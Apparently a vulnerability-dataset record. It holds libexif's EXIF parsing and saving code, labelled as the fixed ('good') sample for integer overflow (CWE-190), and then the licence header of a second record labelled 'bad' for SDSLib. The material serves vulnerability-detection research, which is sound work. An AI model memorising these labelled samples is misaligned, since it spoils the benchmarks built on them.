if (!(data->priv->options & EXIF_DATA_OPTION_DONT_CHANGE_MAKER_NOTE)) {
/* If this is the maker note tag, update it. */
if ((e->tag == EXIF_TAG_MAKER_NOTE) && data->priv->md) {
/* TODO: this is using the wrong ExifMem to free e->data */
exif_mem_free (data->priv->mem, e->data);
e->data = NULL;
e->size = 0;
exif_mnote_data_set_offset (data->priv->md, *ds - 6);
exif_mnote_data_save (data->priv->md, &e->data, &e->size);
e->components = e->size;
if (exif_format_get_size (e->format) != 1) {
/* e->format is taken from input code,
* but we need to make sure it is a 1 byte
* entity due to the multiplication below. */
e->format = EXIF_FORMAT_UNDEFINED;
}
}
}
exif_set_long (*d + 6 + offset + 4,
data->priv->order, e->components);
/*
* Size? If bigger than 4 bytes, the actual data is not in
* the entry but somewhere else.
*/
s = exif_format_get_size (e->format) * e->components;
if (s > 4) {
unsigned char *t;
doff = *ds - 6;
ts = *ds + s;
/*
* According to the TIFF specification,
* the offset must be an even number. If we need to introduce
* a padding byte, we set it to 0.
*/
if (s & 1)
ts++;
t = exif_mem_realloc (data->priv->mem, *d, ts);
if (!t) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", ts);
return;
}
*d = t;
*ds = ts;
exif_set_long (*d + 6 + offset + 8, data->priv->order, doff);
if (s & 1)
*(*d + *ds - 1) = '\0';
} else
doff = offset + 8;
/* Write the data. Fill unneeded bytes with 0. Do not crash if
* e->data is NULL */
if (e->data) {
memcpy (*d + 6 + doff, e->data, s);
} else {
memset (*d + 6 + doff, 0, s);
}
if (s < 4)
memset (*d + 6 + doff + s, 0, (4 - s));
}
static void
exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
unsigned int ds, ExifLong o, ExifLong s)
{
/* Sanity checks */
if (o >= ds) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail offset (%u).", o);
return;
}
if (s > ds - o) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail size (%u), max would be %u.", s, ds-o);
return;
}
if (data->data)
exif_mem_free (data->priv->mem, data->data);
if (!(data->data = exif_data_alloc (data, s))) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", s);
data->size = 0;
return;
}
data->size = s;
memcpy (data->data, d + o, s);
}
#undef CHECK_REC
#define CHECK_REC(i) \
if ((i) == ifd) { \
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, \
"ExifData", "Recursive entry in IFD " \
"'%s' detected. Skipping...", \
exif_ifd_get_name (i)); \
break; \
} \
if (data->ifd[(i)]->count) { \
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, \
"ExifData", "Attempt to load IFD " \
"'%s' multiple times detected. " \
"Skipping...", \
exif_ifd_get_name (i)); \
break; \
}
/*! Calculate the recursion cost added by one level of IFD loading.
*
* The work performed is related to the cost in the exponential relation
* work=1.1**cost
*/
static unsigned int
level_cost(unsigned int n)
{
static const double log_1_1 = 0.09531017980432493;
/* Adding 0.1 protects against the case where n==1 */
return ceil(log(n + 0.1)/log_1_1);
}
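/* Worked example of the budget used below (recursion_cost is capped at
 * 170): an IFD with ~10 entries costs level_cost(10) =
 * ceil(ln(10.1)/ln(1.1)) = 25 per level, allowing roughly 6 nested IFDs,
 * while a pathological IFD with ~3000 entries costs roughly 84,
 * allowing only about 2 levels. */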
/*! Load data for an IFD.
*
* \param[in,out] data #ExifData
* \param[in] ifd IFD to load
* \param[in] d pointer to buffer containing raw IFD data
* \param[in] ds size of raw data in buffer at \c d
* \param[in] offset offset into buffer at \c d at which IFD starts
* \param[in] recursion_cost factor indicating how expensive this recursive
* call could be
*/
static void
exif_data_load_data_content (ExifData *data, ExifIfd ifd,
const unsigned char *d,
unsigned int ds, unsigned int offset, unsigned int recursion_cost)
{
ExifLong o, thumbnail_offset = 0, thumbnail_length = 0;
ExifShort n;
ExifEntry *entry;
unsigned int i;
ExifTag tag;
if (!data || !data->priv)
return;
/* check for valid ExifIfd enum range */
if ((((int)ifd) < 0) || ( ((int)ifd) >= EXIF_IFD_COUNT))
return;
if (recursion_cost > 170) {
/*
* recursion_cost is a logarithmic-scale indicator of how expensive this
* recursive call might end up being. It is an indicator of the depth of
* recursion as well as the potential for worst-case future recursive
* calls. Since it's difficult to tell ahead of time how often recursion
* will occur, this assumes the worst by assuming every tag could end up
* causing recursion.
* The value of 170 was chosen to limit typical EXIF structures to a
* recursive depth of about 6, but pathological ones (those with very
* many tags) to only 2.
*/
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
"Deep/expensive recursion detected!");
return;
}
/* Read the number of entries */
if ((offset + 2 < offset) || (offset + 2 < 2) || (offset + 2 > ds)) {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
"Tag data past end of buffer (%u > %u)", offset+2, ds);
return;
}
n = exif_get_short (d + offset, data->priv->order);
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Loading %hu entries...", n);
offset += 2;
/* Check if we have enough data. */
if (offset + 12 * n > ds) {
n = (ds - offset) / 12;
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Short data; only loading %hu entries...", n);
}
for (i = 0; i < n; i++) {
tag = exif_get_short (d + offset + 12 * i, data->priv->order);
switch (tag) {
case EXIF_TAG_EXIF_IFD_POINTER:
case EXIF_TAG_GPS_INFO_IFD_POINTER:
case EXIF_TAG_INTEROPERABILITY_IFD_POINTER:
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH:
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT:
o = exif_get_long (d + offset + 12 * i + 8,
data->priv->order);
/* FIXME: IFD_POINTER tags aren't marked as being in a
* specific IFD, so exif_tag_get_name_in_ifd won't work
*/
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Sub-IFD entry 0x%x ('%s') at %u.", tag,
exif_tag_get_name(tag), o);
switch (tag) {
case EXIF_TAG_EXIF_IFD_POINTER:
CHECK_REC (EXIF_IFD_EXIF);
exif_data_load_data_content (data, EXIF_IFD_EXIF, d, ds, o,
recursion_cost + level_cost(n));
break;
case EXIF_TAG_GPS_INFO_IFD_POINTER:
CHECK_REC (EXIF_IFD_GPS);
exif_data_load_data_content (data, EXIF_IFD_GPS, d, ds, o,
recursion_cost + level_cost(n));
break;
case EXIF_TAG_INTEROPERABILITY_IFD_POINTER:
CHECK_REC (EXIF_IFD_INTEROPERABILITY);
exif_data_load_data_content (data, EXIF_IFD_INTEROPERABILITY, d, ds, o,
recursion_cost + level_cost(n));
break;
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT:
thumbnail_offset = o;
if (thumbnail_offset && thumbnail_length)
exif_data_load_data_thumbnail (data, d,
ds, thumbnail_offset,
thumbnail_length);
break;
case EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH:
thumbnail_length = o;
if (thumbnail_offset && thumbnail_length)
exif_data_load_data_thumbnail (data, d,
ds, thumbnail_offset,
thumbnail_length);
break;
default:
return;
}
break;
default:
/*
* If we don't know the tag, don't fail. It could be that new
* versions of the standard have defined additional tags. Note that
* 0 is a valid tag in the GPS IFD.
*/
if (!exif_tag_get_name_in_ifd (tag, ifd)) {
/*
* Special case: Tag and format 0. That's against specification
* (at least up to 2.2). But Photoshop writes it anyway.
*/
if (!memcmp (d + offset + 12 * i, "\0\0\0\0", 4)) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Skipping empty entry at position %u in '%s'.", i,
exif_ifd_get_name (ifd));
break;
}
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Unknown tag 0x%04x (entry %u in '%s'). Please report this tag "
"to <libexif-devel@lists.sourceforge.net>.", tag, i,
exif_ifd_get_name (ifd));
if (data->priv->options & EXIF_DATA_OPTION_IGNORE_UNKNOWN_TAGS)
break;
}
entry = exif_entry_new_mem (data->priv->mem);
if (!entry) {
exif_log (data->priv->log, EXIF_LOG_CODE_NO_MEMORY, "ExifData",
"Could not allocate memory");
return;
}
if (exif_data_load_data_entry (data, entry, d, ds,
offset + 12 * i))
exif_content_add_entry (data->ifd[ifd], entry);
exif_entry_unref (entry);
break;
}
}
}
static int
cmp_func (const unsigned char *p1, const unsigned char *p2, ExifByteOrder o)
{
ExifShort tag1 = exif_get_short (p1, o);
ExifShort tag2 = exif_get_short (p2, o);
return (tag1 < tag2) ? -1 : (tag1 > tag2) ? 1 : 0;
}
static int
cmp_func_intel (const void *elem1, const void *elem2)
{
return cmp_func ((const unsigned char *) elem1,
(const unsigned char *) elem2, EXIF_BYTE_ORDER_INTEL);
}
static int
cmp_func_motorola (const void *elem1, const void *elem2)
{
return cmp_func ((const unsigned char *) elem1,
(const unsigned char *) elem2, EXIF_BYTE_ORDER_MOTOROLA);
}
static void
exif_data_save_data_content (ExifData *data, ExifContent *ifd,
unsigned char **d, unsigned int *ds,
unsigned int offset)
{
unsigned int j, n_ptr = 0, n_thumb = 0;
ExifIfd i;
unsigned char *t;
unsigned int ts;
if (!data || !data->priv || !ifd || !d || !ds)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++)
if (ifd == data->ifd[i])
break;
if (i == EXIF_IFD_COUNT)
return; /* error */
/*
* Check if we need some extra entries for pointers or the thumbnail.
*/
switch (i) {
case EXIF_IFD_0:
/*
* The pointer to IFD_EXIF is in IFD_0. The pointer to
* IFD_INTEROPERABILITY is in IFD_EXIF.
*/
if (data->ifd[EXIF_IFD_EXIF]->count ||
data->ifd[EXIF_IFD_INTEROPERABILITY]->count)
n_ptr++;
/* The pointer to IFD_GPS is in IFD_0. */
if (data->ifd[EXIF_IFD_GPS]->count)
n_ptr++;
break;
case EXIF_IFD_1:
if (data->size)
n_thumb = 2;
break;
case EXIF_IFD_EXIF:
if (data->ifd[EXIF_IFD_INTEROPERABILITY]->count)
n_ptr++;
default:
break;
}
/*
* Allocate enough memory for all entries
* and the number of entries.
*/
ts = *ds + (2 + (ifd->count + n_ptr + n_thumb) * 12 + 4);
t = exif_mem_realloc (data->priv->mem, *d, ts);
if (!t) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", ts);
return;
}
*d = t;
*ds = ts;
/* Save the number of entries */
exif_set_short (*d + 6 + offset, data->priv->order,
(ExifShort) (ifd->count + n_ptr + n_thumb));
offset += 2;
/*
* Save each entry. Make sure that no memcpys from NULL pointers are
* performed
*/
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Saving %i entries (IFD '%s', offset: %i)...",
ifd->count, exif_ifd_get_name (i), offset);
for (j = 0; j < ifd->count; j++) {
if (ifd->entries[j]) {
exif_data_save_data_entry (data, ifd->entries[j], d, ds,
offset + 12 * j);
}
}
offset += 12 * ifd->count;
/* Now save special entries. */
switch (i) {
case EXIF_IFD_0:
/*
* The pointer to IFD_EXIF is in IFD_0.
* However, the pointer to IFD_INTEROPERABILITY is in IFD_EXIF,
* therefore, if IFD_INTEROPERABILITY is not empty, we need
* IFD_EXIF even if the latter is empty.
*/
if (data->ifd[EXIF_IFD_EXIF]->count ||
data->ifd[EXIF_IFD_INTEROPERABILITY]->count) {
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_EXIF_IFD_POINTER);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
exif_data_save_data_content (data,
data->ifd[EXIF_IFD_EXIF], d, ds, *ds - 6);
offset += 12;
}
/* The pointer to IFD_GPS is in IFD_0, too. */
if (data->ifd[EXIF_IFD_GPS]->count) {
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_GPS_INFO_IFD_POINTER);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
exif_data_save_data_content (data,
data->ifd[EXIF_IFD_GPS], d, ds, *ds - 6);
offset += 12;
}
break;
case EXIF_IFD_EXIF:
/*
* The pointer to IFD_INTEROPERABILITY is in IFD_EXIF.
* See note above.
*/
if (data->ifd[EXIF_IFD_INTEROPERABILITY]->count) {
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_INTEROPERABILITY_IFD_POINTER);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
exif_data_save_data_content (data,
data->ifd[EXIF_IFD_INTEROPERABILITY], d, ds,
*ds - 6);
offset += 12;
}
break;
case EXIF_IFD_1:
/*
* Information about the thumbnail (if any) is saved in
* IFD_1.
*/
if (data->size) {
/* EXIF_TAG_JPEG_INTERCHANGE_FORMAT */
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_JPEG_INTERCHANGE_FORMAT);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
*ds - 6);
ts = *ds + data->size;
t = exif_mem_realloc (data->priv->mem, *d, ts);
if (!t) {
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData",
ts);
return;
}
*d = t;
*ds = ts;
memcpy (*d + *ds - data->size, data->data, data->size);
offset += 12;
/* EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH */
exif_set_short (*d + 6 + offset + 0, data->priv->order,
EXIF_TAG_JPEG_INTERCHANGE_FORMAT_LENGTH);
exif_set_short (*d + 6 + offset + 2, data->priv->order,
EXIF_FORMAT_LONG);
exif_set_long (*d + 6 + offset + 4, data->priv->order,
1);
exif_set_long (*d + 6 + offset + 8, data->priv->order,
data->size);
offset += 12;
}
break;
default:
break;
}
/* Sort the directory according to TIFF specification */
qsort (*d + 6 + offset - (ifd->count + n_ptr + n_thumb) * 12,
(ifd->count + n_ptr + n_thumb), 12,
(data->priv->order == EXIF_BYTE_ORDER_INTEL) ? cmp_func_intel : cmp_func_motorola);
/* Correctly terminate the directory */
if (i == EXIF_IFD_0 && (data->ifd[EXIF_IFD_1]->count ||
data->size)) {
/*
* We are saving IFD 0. Tell where IFD 1 starts and save
* IFD 1.
*/
exif_set_long (*d + 6 + offset, data->priv->order, *ds - 6);
exif_data_save_data_content (data, data->ifd[EXIF_IFD_1], d, ds,
*ds - 6);
} else
exif_set_long (*d + 6 + offset, data->priv->order, 0);
}
typedef enum {
EXIF_DATA_TYPE_MAKER_NOTE_NONE = 0,
EXIF_DATA_TYPE_MAKER_NOTE_CANON = 1,
EXIF_DATA_TYPE_MAKER_NOTE_OLYMPUS = 2,
EXIF_DATA_TYPE_MAKER_NOTE_PENTAX = 3,
EXIF_DATA_TYPE_MAKER_NOTE_NIKON = 4,
EXIF_DATA_TYPE_MAKER_NOTE_CASIO = 5,
EXIF_DATA_TYPE_MAKER_NOTE_FUJI = 6
} ExifDataTypeMakerNote;
/*! If MakerNote is recognized, load it.
*
* \param[in,out] data #ExifData
* \param[in] d pointer to raw EXIF data
* \param[in] ds length of data at d
*/
static void
interpret_maker_note(ExifData *data, const unsigned char *d, unsigned int ds)
{
int mnoteid;
ExifEntry* e = exif_data_get_entry (data, EXIF_TAG_MAKER_NOTE);
if (!e)
return;
if ((mnoteid = exif_mnote_data_olympus_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Olympus MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_olympus_new (data->priv->mem);
} else if ((mnoteid = exif_mnote_data_canon_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Canon MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_canon_new (data->priv->mem, data->priv->options);
} else if ((mnoteid = exif_mnote_data_fuji_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Fuji MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_fuji_new (data->priv->mem);
/* NOTE: Must do Pentax detection last because some of the
* heuristics are pretty general. */
} else if ((mnoteid = exif_mnote_data_pentax_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Pentax MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_pentax_new (data->priv->mem);
}
/*
* If we are able to interpret the maker note, do so.
*/
if (data->priv->md) {
exif_mnote_data_log (data->priv->md, data->priv->log);
exif_mnote_data_set_byte_order (data->priv->md,
data->priv->order);
exif_mnote_data_set_offset (data->priv->md,
data->priv->offset_mnote);
exif_mnote_data_load (data->priv->md, d, ds);
}
}
#define LOG_TOO_SMALL \
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData", \
_("Size of data too small to allow for EXIF data."));
void
exif_data_load_data (ExifData *data, const unsigned char *d_orig,
unsigned int ds)
{
unsigned int l;
ExifLong offset;
ExifShort n;
const unsigned char *d = d_orig;
unsigned int len, fullds;
if (!data || !data->priv || !d || !ds)
return;
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Parsing %i byte(s) EXIF data...\n", ds);
/*
* It can be that the data starts with the EXIF header. If it does
* not, search the EXIF marker.
*/
if (ds < 6) {
LOG_TOO_SMALL;
return;
}
if (!memcmp (d, ExifHeader, 6)) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Found EXIF header at start.");
} else {
while (ds >= 3) {
while (ds && (d[0] == 0xff)) {
d++;
ds--;
}
/* JPEG_MARKER_SOI */
if (ds && d[0] == JPEG_MARKER_SOI) {
d++;
ds--;
continue;
}
/* JPEG_MARKER_APP1 */
if (ds && d[0] == JPEG_MARKER_APP1)
break;
/* Skip irrelevant APP markers. The branch for APP1 must come before this,
otherwise this code block will cause APP1 to be skipped. This code path
is only relevant for files that are nonconformant to the EXIF
specification. For conformant files, the APP1 code path above will be
taken. */
if (ds >= 3 && d[0] >= 0xe0 && d[0] <= 0xef) { /* JPEG_MARKER_APPn */
d++;
ds--;
l = (d[0] << 8) | d[1];
if (l > ds)
return;
d += l;
ds -= l;
continue;
}
/* Unknown marker or data. Give up. */
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", _("EXIF marker not found."));
return;
}
if (ds < 3) {
LOG_TOO_SMALL;
return;
}
d++;
ds--;
len = (d[0] << 8) | d[1];
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"We have to deal with %i byte(s) of EXIF data.",
len);
d += 2;
ds -= 2;
}
/*
* Verify the exif header
* (offset 2, length 6).
*/
if (ds < 6) {
LOG_TOO_SMALL;
return;
}
if (memcmp (d, ExifHeader, 6)) {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", _("EXIF header not found."));
return;
}
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Found EXIF header.");
/* Sanity check the data length */
if (ds < 14)
return;
/* The JPEG APP1 section can be no longer than 64 KiB (including a
16-bit length), so cap the data length to protect against overflow
in future offset calculations */
fullds = ds;
if (ds > 0xfffe)
ds = 0xfffe;
/* Byte order (offset 6, length 2) */
if (!memcmp (d + 6, "II", 2))
data->priv->order = EXIF_BYTE_ORDER_INTEL;
else if (!memcmp (d + 6, "MM", 2))
data->priv->order = EXIF_BYTE_ORDER_MOTOROLA;
else {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", _("Unknown encoding."));
return;
}
/* Fixed value */
if (exif_get_short (d + 8, data->priv->order) != 0x002a)
return;
/* IFD 0 offset */
offset = exif_get_long (d + 10, data->priv->order);
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"IFD 0 at %i.", (int) offset);
/* ds is restricted to 16 bit above, so offset is restricted too, and offset+8 should not overflow. */
if (offset > ds || offset + 6 + 2 > ds)
return;
/* Parse the actual exif data (usually offset 14 from start) */
exif_data_load_data_content (data, EXIF_IFD_0, d + 6, ds - 6, offset, 0);
/* IFD 1 offset */
n = exif_get_short (d + 6 + offset, data->priv->order);
/* offset < 2<<16, n is 16 bit at most, so this op will not overflow */
if (offset + 6 + 2 + 12 * n + 4 > ds)
return;
offset = exif_get_long (d + 6 + offset + 2 + 12 * n, data->priv->order);
if (offset) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"IFD 1 at %i.", (int) offset);
/* Sanity check. ds is ensured to be above 6 above, offset is 16bit */
if (offset > ds - 6) {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", "Bogus offset of IFD1.");
} else {
exif_data_load_data_content (data, EXIF_IFD_1, d + 6, ds - 6, offset, 0);
}
}
/*
* If we got an EXIF_TAG_MAKER_NOTE, try to interpret it. Some
* cameras use pointers in the maker note tag that point to the
* space between IFDs. Here is the only place where we have access
* to that data.
*/
interpret_maker_note(data, d, fullds);
/* Fixup tags if requested */
if (data->priv->options & EXIF_DATA_OPTION_FOLLOW_SPECIFICATION)
exif_data_fix (data);
}
void
exif_data_save_data (ExifData *data, unsigned char **d, unsigned int *ds)
{
if (ds)
*ds = 0; /* This means something went wrong */
if (!data || !d || !ds)
return;
/* Header */
*ds = 14;
*d = exif_data_alloc (data, *ds);
if (!*d) {
*ds = 0;
return;
}
memcpy (*d, ExifHeader, 6);
/* Order (offset 6) */
if (data->priv->order == EXIF_BYTE_ORDER_INTEL) {
memcpy (*d + 6, "II", 2);
} else {
memcpy (*d + 6, "MM", 2);
}
/* Fixed value (2 bytes, offset 8) */
exif_set_short (*d + 8, data->priv->order, 0x002a);
/*
* IFD 0 offset (4 bytes, offset 10).
* We will start 8 bytes after the
* EXIF header (2 bytes for order, another 2 for the test, and
* 4 bytes for the IFD 0 offset make 8 bytes together).
*/
exif_set_long (*d + 10, data->priv->order, 8);
/* Now save IFD 0. IFD 1 will be saved automatically. */
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Saving IFDs...");
exif_data_save_data_content (data, data->ifd[EXIF_IFD_0], d, ds,
*ds - 6);
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Saved %i byte(s) EXIF data.", *ds);
}
ExifData *
exif_data_new_from_file (const char *path)
{
ExifData *edata;
ExifLoader *loader;
loader = exif_loader_new ();
exif_loader_write_file (loader, path);
edata = exif_loader_get_data (loader);
exif_loader_unref (loader);
return (edata);
}
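/* Typical caller sketch (illustrative): load, inspect, release.
 *
 *   ExifData *ed = exif_data_new_from_file ("photo.jpg");
 *   if (ed) {
 *           exif_data_dump (ed);
 *           exif_data_unref (ed);
 *   }
 */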
void
exif_data_ref (ExifData *data)
{
if (!data)
return;
data->priv->ref_count++;
}
void
exif_data_unref (ExifData *data)
{
if (!data)
return;
data->priv->ref_count--;
if (!data->priv->ref_count)
exif_data_free (data);
}
void
exif_data_free (ExifData *data)
{
unsigned int i;
ExifMem *mem = (data && data->priv) ? data->priv->mem : NULL;
if (!data)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++) {
if (data->ifd[i]) {
exif_content_unref (data->ifd[i]);
data->ifd[i] = NULL;
}
}
if (data->data) {
exif_mem_free (mem, data->data);
data->data = NULL;
}
if (data->priv) {
if (data->priv->log) {
exif_log_unref (data->priv->log);
data->priv->log = NULL;
}
if (data->priv->md) {
exif_mnote_data_unref (data->priv->md);
data->priv->md = NULL;
}
exif_mem_free (mem, data->priv);
exif_mem_free (mem, data);
}
exif_mem_unref (mem);
}
void
exif_data_dump (ExifData *data)
{
unsigned int i;
if (!data)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++) {
if (data->ifd[i] && data->ifd[i]->count) {
printf ("Dumping IFD '%s'...\n",
exif_ifd_get_name (i));
exif_content_dump (data->ifd[i], 0);
}
}
if (data->data) {
printf ("%i byte(s) thumbnail data available: ", data->size);
if (data->size >= 4) {
printf ("0x%02x 0x%02x ... 0x%02x 0x%02x\n",
data->data[0], data->data[1],
data->data[data->size - 2],
data->data[data->size - 1]);
}
}
}
ExifByteOrder
exif_data_get_byte_order (ExifData *data)
{
if (!data)
return (0);
return (data->priv->order);
}
void
exif_data_foreach_content (ExifData *data, ExifDataForeachContentFunc func,
void *user_data)
{
unsigned int i;
if (!data || !func)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++)
func (data->ifd[i], user_data);
}
typedef struct _ByteOrderChangeData ByteOrderChangeData;
struct _ByteOrderChangeData {
ExifByteOrder old, new;
};
static void
entry_set_byte_order (ExifEntry *e, void *data)
{
ByteOrderChangeData *d = data;
if (!e)
return;
exif_array_set_byte_order (e->format, e->data, e->components, d->old, d->new);
}
static void
content_set_byte_order (ExifContent *content, void *data)
{
exif_content_foreach_entry (content, entry_set_byte_order, data);
}
void
exif_data_set_byte_order (ExifData *data, ExifByteOrder order)
{
ByteOrderChangeData d;
if (!data || (order == data->priv->order))
return;
d.old = data->priv->order;
d.new = order;
exif_data_foreach_content (data, content_set_byte_order, &d);
data->priv->order = order;
if (data->priv->md)
exif_mnote_data_set_byte_order (data->priv->md, order);
}
void
exif_data_log (ExifData *data, ExifLog *log)
{
unsigned int i;
if (!data || !data->priv)
return;
exif_log_unref (data->priv->log);
data->priv->log = log;
exif_log_ref (log);
for (i = 0; i < EXIF_IFD_COUNT; i++)
exif_content_log (data->ifd[i], log);
}
/* Used internally within libexif */
ExifLog *exif_data_get_log (ExifData *);
ExifLog *
exif_data_get_log (ExifData *data)
{
if (!data || !data->priv)
return NULL;
return data->priv->log;
}
static const struct {
ExifDataOption option;
const char *name;
const char *description;
} exif_data_option[] = {
{EXIF_DATA_OPTION_IGNORE_UNKNOWN_TAGS, N_("Ignore unknown tags"),
N_("Ignore unknown tags when loading EXIF data.")},
{EXIF_DATA_OPTION_FOLLOW_SPECIFICATION, N_("Follow specification"),
N_("Add, correct and remove entries to get EXIF data that follows "
"the specification.")},
{EXIF_DATA_OPTION_DONT_CHANGE_MAKER_NOTE, N_("Do not change maker note"),
N_("When loading and resaving Exif data, save the maker note unmodified."
" Be aware that the maker note can get corrupted.")},
{0, NULL, NULL}
};
const char *
exif_data_option_get_name (ExifDataOption o)
{
unsigned int i;
for (i = 0; exif_data_option[i].name; i++)
if (exif_data_option[i].option == o)
break;
return _(exif_data_option[i].name);
}
const char *
exif_data_option_get_description (ExifDataOption o)
{
unsigned int i;
for (i = 0; exif_data_option[i].description; i++)
if (exif_data_option[i].option == o)
break;
return _(exif_data_option[i].description);
}
void
exif_data_set_option (ExifData *d, ExifDataOption o)
{
if (!d)
return;
d->priv->options |= o;
}
void
exif_data_unset_option (ExifData *d, ExifDataOption o)
{
if (!d)
return;
d->priv->options &= ~o;
}
static void
fix_func (ExifContent *c, void *UNUSED(data))
{
switch (exif_content_get_ifd (c)) {
case EXIF_IFD_1:
if (c->parent->data)
exif_content_fix (c);
else if (c->count) {
exif_log (c->parent->priv->log, EXIF_LOG_CODE_DEBUG, "exif-data",
"No thumbnail but entries on thumbnail. These entries have been "
"removed.");
while (c->count) {
unsigned int cnt = c->count;
exif_content_remove_entry (c, c->entries[c->count - 1]);
if (cnt == c->count) {
/* safety net */
exif_log (c->parent->priv->log, EXIF_LOG_CODE_DEBUG, "exif-data",
"failed to remove last entry from entries.");
c->count--;
}
}
}
break;
default:
exif_content_fix (c);
}
}
void
exif_data_fix (ExifData *d)
{
exif_data_foreach_content (d, fix_func, NULL);
}
void
exif_data_set_data_type (ExifData *d, ExifDataType dt)
{
if (!d || !d->priv)
return;
d->priv->data_type = dt;
}
ExifDataType
exif_data_get_data_type (ExifData *d)
{
return (d && d->priv) ? d->priv->data_type : EXIF_DATA_TYPE_UNKNOWN;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_1433_0 |
crossvul-cpp_data_bad_1943_1 | /* SDSLib 2.0 -- A C dynamic strings library
*
* Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
* Copyright (c) 2015, Oran Agra
* Copyright (c) 2015, Redis Labs, Inc
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of Redis nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
